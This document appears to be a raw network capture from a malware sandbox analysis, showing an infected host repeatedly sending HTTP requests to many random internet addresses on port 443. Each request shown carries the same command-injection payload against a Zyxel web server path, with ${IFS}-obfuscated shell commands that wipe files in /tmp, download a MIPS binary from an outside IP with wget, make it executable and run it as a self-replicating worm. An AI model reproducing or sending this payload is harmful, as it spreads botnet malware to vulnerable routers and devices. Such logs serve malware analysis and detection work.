                                                Jan 28, 2024 10:16:16.678726912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2173192.168.2.2335544140.77.201.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678776026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2174192.168.2.235992834.116.234.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678787947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2175192.168.2.2350624194.230.135.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678827047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2176192.168.2.233340296.248.87.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678855896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2177192.168.2.235266048.81.216.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678885937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2178192.168.2.2356138221.35.241.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678917885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2179192.168.2.23476121.174.99.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678947926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2180192.168.2.2333952112.120.189.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678978920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2181192.168.2.235949235.187.186.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678989887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2182192.168.2.235798893.50.5.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678989887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2183192.168.2.2342258206.65.151.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679013014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2184192.168.2.235890238.20.119.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679064035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2185192.168.2.233539635.10.105.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679291964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2186192.168.2.235770672.176.151.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679313898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2187192.168.2.2355740136.123.173.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679325104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2188192.168.2.2334602201.195.102.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679373026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2189192.168.2.2335024204.84.107.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679394007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2190192.168.2.2337104169.57.139.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679428101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2191192.168.2.235119268.48.180.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679455042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2192192.168.2.2347300206.5.215.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679456949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2193192.168.2.2337500170.235.98.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679500103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2194192.168.2.2358972213.253.125.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679529905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2195192.168.2.2352070178.186.69.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679539919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2196192.168.2.2339128194.93.11.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679565907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2197192.168.2.2346834120.250.79.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679600000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2198192.168.2.2336206148.186.46.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679625034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2199192.168.2.2350582223.201.51.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679626942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2200192.168.2.234932889.116.179.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679649115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2201192.168.2.234265841.249.222.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679687977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2202192.168.2.233615849.132.65.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679716110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2203192.168.2.2354070179.58.203.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679740906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2204192.168.2.235940296.126.89.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679779053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2205192.168.2.2338428184.212.92.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679801941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2206192.168.2.233356090.113.179.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679806948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2207192.168.2.23365505.158.74.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679828882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2208192.168.2.2339530186.35.148.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679879904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2209192.168.2.2336596139.215.28.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679907084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2210192.168.2.2351090168.111.166.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679912090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2211192.168.2.233604412.76.140.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679923058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2212192.168.2.234850446.60.248.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679949045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2213192.168.2.2333494177.28.169.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.679986954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2214192.168.2.2352970157.202.242.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680035114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2215192.168.2.234048042.115.64.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680038929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2216192.168.2.2356664152.37.48.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680067062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2217192.168.2.234432291.184.18.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680115938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2218192.168.2.2347068208.186.161.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680150986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2219192.168.2.2338372221.87.52.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680175066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2220192.168.2.2334058180.108.69.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680183887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2221192.168.2.2337922143.235.49.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680223942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2222192.168.2.235943685.74.212.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680252075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2223192.168.2.233990674.252.68.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680282116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2224192.168.2.2336676207.45.41.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680318117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2225192.168.2.2355012167.125.9.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680335999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2226192.168.2.235049488.77.177.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680350065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2227192.168.2.2350652120.104.183.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680372000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2228192.168.2.235496673.189.191.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680413961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2229192.168.2.2339956191.20.235.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680428028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2230192.168.2.2337678146.110.135.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680480003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2231192.168.2.2349336178.63.187.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680531979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2232192.168.2.234467842.99.169.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680553913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2233192.168.2.2334080160.74.21.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.680565119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2234192.168.2.2354562137.58.7.202443
                                                TimestampBytes transferredDirectionData
